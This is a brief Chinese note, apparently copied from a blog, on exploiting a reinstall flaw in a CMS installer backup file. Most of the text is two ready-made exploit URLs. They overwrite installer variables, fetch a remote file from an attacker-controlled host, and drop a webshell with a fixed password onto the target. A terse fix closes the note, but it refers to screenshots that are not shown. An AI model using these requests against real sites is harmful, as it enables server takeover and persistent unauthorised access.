利用前提存在重装漏洞
在自己网站准备一个远程文件
http://www.d.com/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=…/data/admin/config_update.php
http://www.d.com/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=1720.php&updateHost=http://www.a.com/
生成http://www.d.com/install/1720.php 密码 x,webshell连接
存在漏洞的代码
url参数,存在可以控制的参数,变量被覆盖,如下
insLockfile=a&s_lang=a
从而绕过了包含的远程链接
代码包含了config_update.php
修复:
把红框的代码放在前面
更改位置后
来源地址:https://blog.csdn.net/weixin_43778463/article/details/127715835
